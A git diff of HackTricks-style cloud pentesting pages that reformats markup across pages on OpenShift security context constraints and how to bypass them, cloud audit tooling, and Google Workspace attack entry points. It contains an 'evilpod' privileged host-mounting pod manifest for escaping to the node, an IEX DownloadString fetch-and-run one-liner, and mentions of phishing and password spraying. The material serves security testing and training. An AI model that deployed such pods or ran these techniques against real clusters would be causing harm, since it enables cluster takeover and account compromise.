-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/README.md b/src/pentesting-cloud/openshift-pentesting/README.md new file mode 100644 index 000000000..f06a1552c --- /dev/null +++ b/src/pentesting-cloud/openshift-pentesting/README.md @@ -0,0 +1,19 @@ +# OpenShift Pentesting + +## Basic Information + +{{#ref}} +openshift-basic-information.md +{{#endref}} + +## Security Context Constraints + +{{#ref}} +openshift-scc.md +{{#endref}} + +## Privilege Escalation + +{{#ref}} +openshift-privilege-escalation/ +{{#endref}} diff --git a/pentesting-cloud/openshift-pentesting/openshift-basic-information.md b/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md similarity index 66% rename from pentesting-cloud/openshift-pentesting/openshift-basic-information.md rename to src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md index 053271501..59647f2e9 100644 --- a/pentesting-cloud/openshift-pentesting/openshift-basic-information.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md @@ -14,7 +14,9 @@ OpenShift is Red Hat’s container application platform that offers a superset o OpenShift come with a it's own CLI, that can be found here: -{% embed url="https://docs.openshift.com/container-platform/4.11/cli_reference/openshift_cli/getting-started-cli.html" %} +{{#ref}} +https://docs.openshift.com/container-platform/4.11/cli_reference/openshift_cli/getting-started-cli.html +{{#endref}} To login using the CLI: 
@@ -25,12 +27,14 @@ oc login -s= --token= ### **OpenShift - Security Context Constraints** -In addition to the [RBAC resources](https://docs.openshift.com/container-platform/3.11/architecture/additional\_concepts/authorization.html#architecture-additional-concepts-authorization) that control what a user can do, OpenShift Container Platform provides _security context constraints_ (SCC) that control the actions that a pod can perform and what it has the ability to access. +In addition to the [RBAC resources](https://docs.openshift.com/container-platform/3.11/architecture/additional_concepts/authorization.html#architecture-additional-concepts-authorization) that control what a user can do, OpenShift Container Platform provides _security context constraints_ (SCC) that control the actions that a pod can perform and what it has the ability to access. SCC is a policy object that has special rules that correspond with the infrastructure itself, unlike RBAC that has rules that correspond with the Platform. It helps us define what Linux access-control features the container should be able to request/run. Example: Linux Capabilities, SECCOMP profiles, Mount localhost dirs, etc. -{% content-ref url="openshift-scc.md" %} -[openshift-scc.md](openshift-scc.md) -{% endcontent-ref %} +{{#ref}} +openshift-scc.md +{{#endref}} -{% embed url="https://docs.openshift.com/container-platform/3.11/architecture/additional_concepts/authorization.html#security-context-constraints" %} +{{#ref}} +https://docs.openshift.com/container-platform/3.11/architecture/additional_concepts/authorization.html#security-context-constraints +{{#endref}} 
diff --git a/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md similarity index 93% rename from pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md rename to src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md index d9d87e5e1..eb111ebd7 100644 --- a/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md @@ -34,6 +34,6 @@ You can just edit a build script (such as Jenkinsfile), commit and push (eventua ## Jenkins Build Pod YAML override -{% content-ref url="openshift-jenkins-build-overrides.md" %} -[openshift-jenkins-build-overrides.md](openshift-jenkins-build-overrides.md) -{% endcontent-ref %} +{{#ref}} +openshift-jenkins-build-overrides.md +{{#endref}} diff --git a/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md similarity index 100% rename from pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md rename to src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md new file mode 100644 index 000000000..437a848f6 --- /dev/null +++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md @@ -0,0 +1,19 @@ +# OpenShift - Privilege Escalation + +## Missing Service Account + +{{#ref}} +openshift-missing-service-account.md +{{#endref}} + +## Tekton + +{{#ref}} +openshift-tekton.md +{{#endref}} + +## SCC Bypass + +{{#ref}} +openshift-scc-bypass.md +{{#endref}} 
diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md similarity index 78% rename from pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md rename to src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md index 57dee3436..60fa06b95 100644 --- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md @@ -4,7 +4,7 @@ It happens that cluster is deployed with preconfigured template automatically setting Roles, RoleBindings and even SCC to service account that is not yet created. This can lead to privilege escalation in the case where you can create them. In this case, you would be able to get the token of the SA newly created and the role or SCC associated. Same case happens when the missing SA is part of a missing project, in this case if you can create the project and then the SA you get the Roles and SCC associated. -
+
In the previous graph we got multiple AbsentProject meaning multiple project that appears in Roles Bindings or SCC but are not yet created in the cluster. In the same vein we also got an AbsentServiceAccount. @@ -12,10 +12,12 @@ If we can create a project and the missing SA in it, the SA will inherited from The following example show a missing SA which is granted node-exporter SCC: -
+
## Tools The following tool can be use to enumerate this issue and more generally to graph an OpenShift cluster: -{% embed url="https://github.com/maxDcb/OpenShiftGrapher" %} +{{#ref}} +https://github.com/maxDcb/OpenShiftGrapher +{{#endref}} diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md similarity index 71% rename from pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md rename to src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md index e89392fa9..b7fae734b 100644 --- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md @@ -6,12 +6,12 @@ By default, SCC does not apply on following projects : -* **default** -* **kube-system** -* **kube-public** -* **openshift-node** -* **openshift-infra** -* **openshift** +- **default** +- **kube-system** +- **kube-public** +- **openshift-node** +- **openshift-infra** +- **openshift** If you deploy pods within one of those namespaces, no SCC will be enforced, allowing for the deployment of privileged pods or mounting of the host file system. @@ -19,8 +19,8 @@ If you deploy pods within one of those namespaces, no SCC will be enforced, allo There is a way to disable the SCC application on your pod according to RedHat documentation. You will need to have at least one of the following permission : -* Create a Namespace and Create a Pod on this Namespace -* Edit a Namespace and Create a Pod on this Namespace +- Create a Namespace and Create a Pod on this Namespace +- Edit a Namespace and Create a Pod on this Namespace ```bash $ oc auth can-i create namespaces 
@@ -32,7 +32,7 @@ $ oc auth can-i patch namespaces The specific label`openshift.io/run-level` enables users to circumvent SCCs for applications. As per RedHat documentation, when this label is utilized, no SCCs are enforced on all pods within that namespace, effectively removing any restrictions. -
+
## Add Label @@ -67,38 +67,38 @@ kind: Pod metadata: name: evilpod labels: - kubernetes.io/hostname: evilpod + kubernetes.io/hostname: evilpod spec: - hostNetwork: true #Bind pod network to the host network + hostNetwork: true #Bind pod network to the host network hostPID: true #See host processes hostIPC: true #Access host inter processes containers: - - name: evil - image: MYIMAGE - imagePullPolicy: IfNotPresent - securityContext: - privileged: true - allowPrivilegeEscalation: true - resources: - limits: - memory: 200Mi - requests: - cpu: 30m - memory: 100Mi - volumeMounts: - - name: hostrootfs - mountPath: /mnt + - name: evil + image: MYIMAGE + imagePullPolicy: IfNotPresent + securityContext: + privileged: true + allowPrivilegeEscalation: true + resources: + limits: + memory: 200Mi + requests: + cpu: 30m + memory: 100Mi + volumeMounts: + - name: hostrootfs + mountPath: /mnt volumes: - - name: hostrootfs - hostPath: - path: + - name: hostrootfs + hostPath: + path: ``` Now, it has become easier to escalate privileges to access the host system and subsequently take over the entire cluster, gaining 'cluster-admin' privileges. Look for **Node-Post Exploitation** part in the following page : -{% content-ref url="../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} +{{#ref}} +../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md +{{#endref}} ### Custom labels @@ -106,11 +106,11 @@ Furthermore, based on the target setup, some custom labels / annotations may be Try to look for custom labels if you can read some resources. Here a list of interesting resources : -* Pod -* Deployment -* Namespace -* Service -* Route +- Pod +- Deployment +- Namespace +- Service +- Route ```bash $ oc get pod -o yaml | grep labels -A 5 
@@ -133,6 +133,6 @@ To bypass GateKeeper's rules and set this label to execute a cluster takeover, * ## References -* [https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html](https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html) -* [https://docs.openshift.com/container-platform/3.11/admin\_guide/manage\_scc.html](https://docs.openshift.com/container-platform/3.11/admin\_guide/manage\_scc.html) -* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper) +- [https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html](https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html) +- [https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html](https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html) +- [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper) diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md similarity index 92% rename from pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md rename to src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md index aa0c55614..bdb8deb70 100644 --- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md 
@@ -10,9 +10,9 @@ With Tekton everything is represented by YAML files. Developers can create Custo When tekton is installed a service account (sa) called pipeline is created in every namespace. When a Pipeline is ran, a pod will be spawned using this sa called `pipeline` to run the tasks defined in the YAML file. -{% embed url="https://tekton.dev/docs/getting-started/pipelines/" %} -Tekton Doc about Pipelines -{% endembed %} +{{#ref}} +https://tekton.dev/docs/getting-started/pipelines/ +{{#endref}} ### The Pipeline service account capabilities @@ -53,9 +53,9 @@ The tekton operator will give to the pipeline service account in `test-namespace Tekton documents about how to restrict the override of scc by adding a label in the `TektonConfig` object. -{% embed url="https://tekton.dev/docs/operator/sccconfig/" %} -Tekton doc about scc -{% endembed %} +{{#ref}} +https://tekton.dev/docs/operator/sccconfig/ +{{#endref}} This label is called `max-allowed` @@ -73,4 +73,3 @@ spec: default: "restricted-v2" maxAllowed: "privileged" ``` - diff --git a/pentesting-cloud/openshift-pentesting/openshift-scc.md b/src/pentesting-cloud/openshift-pentesting/openshift-scc.md similarity index 82% rename from pentesting-cloud/openshift-pentesting/openshift-scc.md rename to src/pentesting-cloud/openshift-pentesting/openshift-scc.md index 68dae698d..6728c4ce2 100644 --- a/pentesting-cloud/openshift-pentesting/openshift-scc.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-scc.md @@ -19,13 +19,13 @@ By configuring SCCs, administrators can ensure that pods are running with the ap Basically, every time a pod deployment is requested, an admission process is executed as the following: -
+
This additional security layer by default prohibits the creation of privileged pods, mounting of the host file system, or setting any attributes that could lead to privilege escalation. -{% content-ref url="../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md" %} -[pod-escape-privileges.md](../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) -{% endcontent-ref %} +{{#ref}} +../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md +{{#endref}} ## List SCC @@ -59,10 +59,10 @@ $ oc apply -f evilpod.yaml #Deploy a privileged pod ## SCC Bypass -{% content-ref url="openshift-privilege-escalation/openshift-scc-bypass.md" %} -[openshift-scc-bypass.md](openshift-privilege-escalation/openshift-scc-bypass.md) -{% endcontent-ref %} +{{#ref}} +openshift-privilege-escalation/openshift-scc-bypass.md +{{#endref}} ## References -* [https://www.redhat.com/en/blog/managing-sccs-in-openshift](https://www.redhat.com/en/blog/managing-sccs-in-openshift) +- [https://www.redhat.com/en/blog/managing-sccs-in-openshift](https://www.redhat.com/en/blog/managing-sccs-in-openshift) diff --git a/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md similarity index 71% rename from pentesting-cloud/pentesting-cloud-methodology.md rename to src/pentesting-cloud/pentesting-cloud-methodology.md index 6e7039d1c..782f630a2 100644 --- a/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -1,48 +1,35 @@ # Pentesting Cloud Methodology -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +{{#include ../banners/hacktricks-training.md}} -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -
+
## Basic Methodology Each cloud has its own peculiarities but in general there are a few **common things a pentester should check** when testing a cloud environment: -* **Benchmark checks** - * This will help you **understand the size** of the environment and **services used** - * It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools** -* **Services Enumeration** - * You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test. - * This will allow you to know **what is exactly being used** in the cloud env - * This will help a lot in the next steps -* **Check exposed assets** - * This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed. - * Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets) - * Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?) -* **Check permissions** - * Here you should **find out all the permissions of each role/user** inside the cloud and how are they used - * Too **many highly privileged** (control everything) accounts? Generated keys not used?... Most of these check should have been done in the benchmark tests already - * If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100) - * It's **not enough to find** which users has **admin** permissions "\*:\*". 
There are a lot of **other permissions** that depending on the services used can be very **sensitive**. - * Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported. -* **Check Integrations** - * It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env. - * For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\ +- **Benchmark checks** + - This will help you **understand the size** of the environment and **services used** + - It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools** +- **Services Enumeration** + - You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test. + - This will allow you to know **what is exactly being used** in the cloud env + - This will help a lot in the next steps +- **Check exposed assets** + - This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed. + - Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets) + - Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?) +- **Check permissions** + - Here you should **find out all the permissions of each role/user** inside the cloud and how are they used + - Too **many highly privileged** (control everything) accounts? 
Generated keys not used?... Most of these check should have been done in the benchmark tests already + - If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100) + - It's **not enough to find** which users has **admin** permissions "\*:\*". There are a lot of **other permissions** that depending on the services used can be very **sensitive**. + - Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported. +- **Check Integrations** + - It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env. + - For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\ For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive is the action in GCP treating that data). - * For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\ + - For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\ For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that and which sensitive info and access will get that image when executed inside an AWS cloud. ## Multi-Cloud tools 
@@ -53,8 +40,9 @@ There are several tools that can be used to test different cloud environments. T A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.** -{% tabs %} -{% tab title="Install" %} +{{#tabs }} +{{#tab name="Install" }} + ```bash # You need to install and run neo4j also git clone https://github.com/carlospolop/PurplePanda @@ -66,9 +54,11 @@ export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687" export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda" python3 main.py -h # Get help ``` -{% endtab %} -{% tab title="GCP" %} +{{#endtab }} + +{{#tab name="GCP" }} + ```bash export GOOGLE_DISCOVERY=$(echo 'google: - file_path: "" @@ -79,8 +69,9 @@ export GOOGLE_DISCOVERY=$(echo 'google: python3 main.py -a -p google #Get basic info of the account to check it's correctly configured python3 main.py -e -p google #Enumerate the env ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### [Prowler](https://github.com/prowler-cloud/prowler) @@ -105,8 +96,9 @@ prowler --list-services AWS, Azure, Github, Google, Oracle, Alibaba -{% tabs %} -{% tab title="Install" %} +{{#tabs }} +{{#tab name="Install" }} + ```bash # Install git clone https://github.com/aquasecurity/cloudsploit.git @@ -115,22 +107,26 @@ npm install ./index.js -h ## Docker instructions in github ``` -{% endtab %} -{% tab title="GCP" %} +{{#endtab }} + +{{#tab name="GCP" }} + ```bash ## You need to have creds for a service account and set them in config.js file ./index.js --cloud google --config ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### [ScoutSuite](https://github.com/nccgroup/ScoutSuite) AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure -{% tabs %} -{% tab title="Install" %} +{{#tabs }} +{{#tab name="Install" }} + ```bash mkdir scout; cd scout virtualenv -p python3 venv 
@@ -139,9 +135,11 @@ pip install scoutsuite scout --help ## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image ``` -{% endtab %} -{% tab title="GCP" %} +{{#endtab }} + +{{#tab name="GCP" }} + ```bash scout gcp --report-dir /tmp/gcp --user-account --all-projects ## use "--service-account KEY_FILE" instead of "--user-account" to use a service account @@ -154,22 +152,25 @@ for pid in $(gcloud projects list --format="value(projectId)"); do scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid" done ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### [Steampipe](https://github.com/turbot) -{% tabs %} -{% tab title="Install" %} +{{#tabs }} +{{#tab name="Install" }} Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew: ``` brew tap turbot/tap brew install steampipe ``` -{% endtab %} -{% tab title="GCP" %} +{{#endtab }} + +{{#tab name="GCP" }} + ```bash # Install gcp plugin steampipe plugin install gcp @@ -203,7 +204,7 @@ done # Generate the aggragator to call echo 'connection "gcp_all" { - plugin = "gcp" + plugin = "gcp" type = "aggregator" connections = ["gcp_*"] }' >> "$FILEPATH" @@ -218,9 +219,10 @@ To check **other GCP insights** (useful for enumerating services) use: [https:// To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance) More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp) -{% endtab %} +{{#endtab }} + +{{#tab name="AWS" }} -{% tab title="AWS" %} ```bash # Install aws plugin steampipe plugin install aws 
@@ -248,8 +250,8 @@ steampipe check all --export=/tmp/output4.json To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance) More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws) -{% endtab %} -{% endtabs %} +{{#endtab }} +{{#endtabs }} ### [~~cs-suite~~](https://github.com/SecurityFTW/cs-suite) @@ -264,8 +266,9 @@ Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Offi Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. -{% tabs %} -{% tab title="Cloudlist" %} +{{#tabs }} +{{#tab name="Cloudlist" }} + ```bash cd /tmp wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip @@ -273,31 +276,37 @@ unzip cloudlist_1.0.1_macOS_arm64.zip chmod +x cloudlist sudo mv cloudlist /usr/local/bin ``` -{% endtab %} -{% tab title="Second Tab" %} +{{#endtab }} + +{{#tab name="Second Tab" }} + ```bash ## For GCP it requires service account JSON credentials cloudlist -config ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### [**cartography**](https://github.com/lyft/cartography) Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. -{% tabs %} -{% tab title="Install" %} +{{#tabs }} +{{#tab name="Install" }} + ```bash # Installation docker image pull ghcr.io/lyft/cartography docker run --platform linux/amd64 ghcr.io/lyft/cartography cartography --help ## Install a Neo4j DB version 3.5.* ``` -{% endtab %} -{% tab title="GCP" %} +{{#endtab }} + +{{#tab name="GCP" }} + ```bash docker run --platform linux/amd64 \ --volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \ 
@@ -317,15 +326,17 @@ docker run --platform linux/amd64 \
 ## Google Kubernetes Engine
 ### If you can run starbase or purplepanda you will get more info
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ### [**starbase**](https://github.com/JupiterOne/starbase)
 Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
-{% tabs %}
-{% tab title="Install" %}
+{{#tabs }}
+{{#tab name="Install" }}
+
 ```bash
 # You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/
 npm install --global yarn
@@ -348,22 +359,23 @@ docker build --no-cache -t starbase:latest .
 docker-compose run starbase setup
 docker-compose run starbase run
 ```
-{% endtab %}
-{% tab title="GCP" %}
+{{#endtab }}
+
+{{#tab name="GCP" }}
+
 ```yaml
 ## Config for GCP
 ### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md
 ### It requires service account credentials
-
+
 integrations:
- -
- name: graph-google-cloud
+ - name: graph-google-cloud
 instanceId: testInstanceId
 directory: ./.integrations/graph-google-cloud
 gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git
 config:
- SERVICE_ACCOUNT_KEY_FILE: '{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}'
+ SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}"
 PROJECT_ID: ""
 FOLDER_ID: ""
 ORGANIZATION_ID: ""
@@ -371,14 +383,15 @@ integrations:
 storage:
 engine: neo4j
- config:
+ config:
 username: neo4j
 password: s3cr3t
 uri: bolt://localhost:7687 #Consider using host.docker.internal if from docker
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ### [**SkyArk**](https://github.com/cyberark/SkyArk)
@@ -389,8 +402,8 @@ Import-Module .\SkyArk.ps1 -force
 Start-AzureStealth
 # in the Cloud Console
-IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
-Scan-AzureAdmins
+IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
+Scan-AzureAdmins
 ```
 ### [Cloud Brute](https://github.com/0xsha/CloudBrute)
@@ -399,39 +412,39 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo
 ### [CloudFox](https://github.com/BishopFox/cloudfox)
-* CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming).
-* It is an enumeration tool which is intended to compliment manual pentesting.
-* It doesn't create or modify any data within the cloud environment.
+- CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming).
+- It is an enumeration tool which is intended to compliment manual pentesting.
+- It doesn't create or modify any data within the cloud environment.
 ### More lists of cloud security tools
-* [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
+- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
 ## Google
 ### GCP
-{% content-ref url="gcp-security/" %}
-[gcp-security](gcp-security/)
-{% endcontent-ref %}
+{{#ref}}
+gcp-security/
+{{#endref}}
 ### Workspace
-{% content-ref url="workspace-security/" %}
-[workspace-security](workspace-security/)
-{% endcontent-ref %}
+{{#ref}}
+workspace-security/
+{{#endref}}
 ## AWS
-{% content-ref url="aws-security/" %}
-[aws-security](aws-security/)
-{% endcontent-ref %}
+{{#ref}}
+aws-security/
+{{#endref}}
 ## Azure
-{% content-ref url="azure-security/" %}
-[azure-security](azure-security/)
-{% endcontent-ref %}
+{{#ref}}
+azure-security/
+{{#endref}}
 ### Attack Graph
@@ -441,17 +454,4 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo
 You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**.
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/workspace-security/README.md b/src/pentesting-cloud/workspace-security/README.md
new file mode 100644
index 000000000..089b8f164
--- /dev/null
+++ b/src/pentesting-cloud/workspace-security/README.md
@@ -0,0 +1,73 @@
+# GWS - Workspace Pentesting
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Entry Points
+
+### Google Platforms and OAuth Apps Phishing
+
+Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in:
+
+{{#ref}}
+gws-google-platforms-phishing/
+{{#endref}}
+
+### Password Spraying
+
+In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address.
+
+## Post-Exploitation
+
+If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges:
+
+{{#ref}}
+gws-post-exploitation.md
+{{#endref}}
+
+### GWS <-->GCP Pivoting
+
+Read more about the different techniques to pivot between GWS and GCP in:
+
+{{#ref}}
+../gcp-security/gcp-to-workspace-pivoting/
+{{#endref}}
+
+## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID)
+
+- **GCPW (Google Credential Provider for Windows)**: This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will **store tokens to access Google Workspace** in some places in the PC.
+- **GCDS (Google CLoud DIrectory Sync)**: This is a tool that can be used to **sync your active directory users and groups to your Workspace**. The tool requires the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
+- **Admin Directory Sync**: It allows you to synchronize users from AD and EntraID in a serverless process from [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
+
+{{#ref}}
+gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/
+{{#endref}}
+
+## Persistence
